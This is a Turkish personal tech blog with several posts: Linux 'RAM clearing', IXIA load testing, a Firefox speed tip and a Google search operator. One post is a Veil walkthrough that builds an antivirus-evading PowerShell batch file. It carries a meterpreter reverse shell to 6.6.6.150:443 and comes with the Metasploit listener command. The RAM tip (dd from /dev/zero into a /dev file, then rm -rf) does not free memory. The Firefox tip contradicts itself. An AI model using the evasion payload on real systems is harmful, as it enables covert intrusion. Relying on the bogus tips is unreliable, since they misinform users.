Vedat FETAH Kimdir?

Ege Üniversitesi Bilgi İşlem Daire Başkanlığı bünyesinde kampüs güvenlik sistemleri yöneticisi olarak çalışma hayatıma devam ediyorum. Günlük yaşamda teknoloji ağırlıklı karşılaştığım ve beğendiğim yazıları paylaşmak amacıyla bu bloğu oluşturdum. Umarım birilerinin bilgilenmesini sağlar.

Halen Çalışmakta Olduğum Yer

Halen Ege Üniversitesi Uluslararası Bilgisayar Enstitüsü Binasında Bilgi İşlem Daire Başkanlığın'da çalışmaya devam etmekteyim.

31 Mayıs 2015 Pazar

Linux Sunucularda Ram Boşaltma

Aşağıdaki komutları yürüterek linux sunucunuzun hafızasını bir nebze de olsa boşaltabilirsiniz.

> dd if=/dev/zero of=/dev/rambosalt
> rm -rf /dev/rambosalt

Sızma Testlerinde Veil ile Antivirüs Uygulamaların Atlatılması

Penetrasyon testlerinde sıklıkla antivirus uygulamalarının atlatılması mecburiyeti doğmaktadır. Çeşitli encoding yöntemleri kullanılarak antivirus yazılımları atlatılabilmektedir. Smbexec, metload benzeri yazılımlar ile istenilen özelliklerde zararlı yazılım üretmek mümkündür. Aşağıda bunlara alternatif ve oldukça başarılı bir uygulama olan VEIL ile bu işlemin nasıl gerçekleştirilebileceğine değinilmiştir.


Windows işletim sistemleri üzerinde çalışan antiviruslere yakalanmayan batch file oluşturmak için aşağıda ki ilgili komutları çalıştırmamız yeterlidir. 6.6.6.150 ipsine 443 portu üzerinden reverse bağlantı kurarak erişim sağlanacaktır.


Öncelikle aşağıdaki komut kullanılarak batch file oluşturulabilir. İlgili komut çalıştırıldıktan sonra .bat uzantılı zararlı uygulamamız oluşmuş olacaktır.


veil -l powershell -p VirtualAlloc -o undetectable --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=6.6.6.150 LPORT=443









Windows üzerinde batch filemizi çalıştırmadan önce lokal makinamızda 443 portu metasploit ile dinleme moduna alıyoruz.


Aşağıda 443 portunun dinleme moduna alınması sağlanmıştır. Payload olarak reverse_tcp kullanılmıştır.



msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=6.6.6.150 LPORT=443 E







Windows üzerinde undetectable.bat dosyamızı çalıştırıyoruz. Çalıştırmamızla birlikle meterpreter shell bizi karşılıyor.






Zararlının çalıştırıldığı system üzerindeki antivirüsün zararlıyla ilgili herhangi bir bloklama işlemi gerçekleştirmediği aşağıda görülebilmektedir.



Kaynak: networkpentest.net

IXIA ile Yük ve Stres Testi

IXIA ile yük ve stres testi yapılabileceği gibi penetrasyon testler esnasında hedef sistemlerin Denial of Services saldırılarına karşı yeterince önlem alınıp alınmadığının testlerinde de kullanılmaktadır. Sisteminizde bulunan cihazların karşılayabileceği yükü öğrenmenin birçok yolu var. IXIA Server ile bu işlemi yapmak bu seçeneklerden bir tanesidir. IXIA, trafik generate eden yüksek persormanslı bir server'dır. Http post/get flood saldırıları başta olmak üzere hemen hemen tüm flood saldırı yöntemlerini desteklemektedir.  Detaylar için http://www.ixiacom.com/ linkine tıklayabilirsiniz. 
   Aşağıda yapmış olduğum yük testlerinden birinin topolojisi bulunmaktadır. Http get isteğiyle LB ve Server'lar için yük testi yapılmıştır.


Topoloji'den Sonra biraz LB üzerindeki konfigürasyonlardan bahsedip, IXIA'ya geçeceğiz. 

    Topolojide F5 LB üzerinde vCMP ile ayrılmış Guestler bulunmaktadır. Bu guestler şasiler arasında yedekli çalışmaktadır. HTTP Guest içerisinde oluşturulmuş Test_VS altında aşağıdaki şekilde ve topolojide görüldüğü gibi 3 adet sunucu bulunmaktadır.


 Bu sunucular üzerinde IIS'ler aktif edilmiş ve bu server'lara 172.30.10.101/test.htm şeklinde istekte bulunulduğunda cevap olarak OK1 dönmektedir. Bu üç sunucu VS arkasına alındıktan sonra IXIA tarafında gerekli çalışmalar başlatılır.

  • IXIA sunucusunun managemet portu ayarlanır
  • Sunucu portları (basılacak trafik bouyuna göre port sayısı arttırılmalıdır) switch'e bağlanır ve switch üzerinde gerekli vlan ayarları yapılır. Örnekte VS IP'si 172.30.20.55 ve VLAN ID'si 20 olduğu için portlar VLAN 20'ye atanmıştır.
  • IXIA Client'ı olan IxLoad, Windows 7'de sorun çıkarabilen bir uygulamadır. Bu nedenle başka bir Win2003 sunucusu üzerinde SQL2005 ile birlikte kurulur. (Önce IxLoad kurulur)
  • Kurulumdan sonra karşınıza aşağıdaki gibi bir ekran çıkacaktır. 

  • New Traffic Flow sekmesinde aşağıdaki gibi bir NetTraffic üretilir.

                    
  • Oluştulan NetTraffic altında, IXIA Sunucusu Client rolünde olacağı için HTTP Client seçilir.

  • Oluşan HTTPClient1 altında Start üzerinde sağ tık>Add Commands yapılır ve isteğimiz get olacağı için get seçilir. Bu adımdan sonra yapacağımız istek bu kısma girilecektir.
  • Test yapılacak IP ve istek sayfası aşağıdaki gibi yazılır.
  • Yukarıdaki şekilde 172.30.20.55 IP'si LB üzerinde oluşturduğumuz Virtaul Server IP'sidir. test.htm ise serverların bu IP'ye yapılan requestlere döndüğü cevaptır. Server'lar üzerindeki IIS'lerde test.htm şeklinde bir dosya bulunmaktadır.
  • Yapılacak istek settings sekmesinden HTTP 1.1 ve maximum secilir.
                                 
  • Şimdi gelelim daha önceden Switch portlarına taktığımız IXIA sunucusunun portlarına.(Yapılan testte 4 adet fiziksel port bağlanmıştır) Bu portların VS'e yapacağı requestler için aynı bloktan veya GW li IP vermek gerekecektir. Bu işlem, aşağıdaki menüden yapılır.

  • Traffic@Network1>Network tıklanarak şeklin altındaki menü aktif edilir. Bu menüde istek yapılacak başlangıç IP'si (3), bu IP'lerin artış şekli(4) ve kaç client yani IP bulunacağı(5) belirlenir.
  • Şimdi sıra IXIA sunucusu üzerindeki porları aktif etmeye. Aşağıdaki şekildeki gibi port

assestment kısmında 2 nolu kutu tıklanır. Burada karşımıza Chasis Name sorulacaktır. Buraya şasi IXIA Sunucu şasi management IP girilir. Bu işlemden sonra 3 nolu bölümde olduğu gibi karşımıza sunucunun portları çıkacaktır. Burada yeşil portlar aktif olan portlardır. Bu portlara çift tıklanarak sağdaki Assigned Ports kısmına atanır.

  • Biraz sabır. Teste başlamamıza çok az kaldı. Bu işlemler tamamlandıktan sonra connectin per sec, kaç sn test yapılacağı gibi adımlar kaldı. Hadi birde bunlara göz atalım.    
  • Timeline and Objective menüsünden istenilen connection per sec sayısı ve süreleri girilir. Örnekte 10.000 Connection 30 sn süre ile sunuculardan 1 iteresyon ile istek gönderecektir. Play butonu ile test başlayacaktır. 
  • Aşağıda daha önceden yapılmış bir testin sonuçları paylaşılmıştır.
    Bu sonuca göre test boyunca 1.76M request gönderilmiştir ve bu requestlerin 115 tanesi başarısız olarak dönmüştür. 

    Reporter menüsünden Generate Report menüsünde otomatik olarak test sonuçları ile ilgili pdf formatında bir rapor hazırlanacaktır.

    Yukarıda http get isteğiyle tamamlanmış bir test bulunmaktadır.
  • Kaynak: NetworkPentest.Net

26 Mayıs 2015 Salı

Firefox'unuzu Hızlandırmanın En Etkili Yolu

Firefox default olarak tracking özelliği açık olarak gelir. Eğer bu özelliği kapatırsanız sitelerin yüklenme hızını arttırmış olursunuz. Mesela www.weather.com sitesi normalde 6.3 saniye gibi bir sürede açılıyorken bu özelliği kapattığınızda 3.5 saniye gibi bir sürede açılıyor.

Bu özelliği kapatmak için aşağıdaki adımları izlemelisiniz.


1. about:config yazarak konfigürasyon sayfasını açın
2. privacy.trackingprotection.enabled değerini aratın
3. bu değer üzerinde çift tıklayın veya değeri true olarak değiştirin.
Bütün işlem bu kadar...

7 Mayıs 2015 Perşembe

Bilmediğiniz Google Arama Operatörü ABOUT()


AROUND() operatörü Daniel Russell tarafından geliştirilmiştir. Amacı ise aratma yaptığınız kelimeler arasında yakınlık belirterek arama sonuçlarını daha isabetli hale getirir. Mesela hot springs kelimesini arattığınız da bütün kaplıcalarla ilgili bilgiler alırsınız. Aşağıdaki çıktı gibi:


Ama birbirleri arasındaki mesafeye dayalı arama yapmak isterseniz AROUND(10) gibi bir operatör kullanabilirsiniz. Bunun yararı şu: kaynaklar arası yakınlık değeri 10 olan sonuçları döndürecektir size. Hot springs örneğini AROUND operatörü ile çalıştırınca aşağıdaki gibi sonuçlar elde edersiniz.


Google gurularının bilgilerine. Neyi nerede ne kadar arayla arayabileceğiniz güzel bir operatorle :)





Paylaş

Twitter Delicious Facebook Digg Stumbleupon Favorites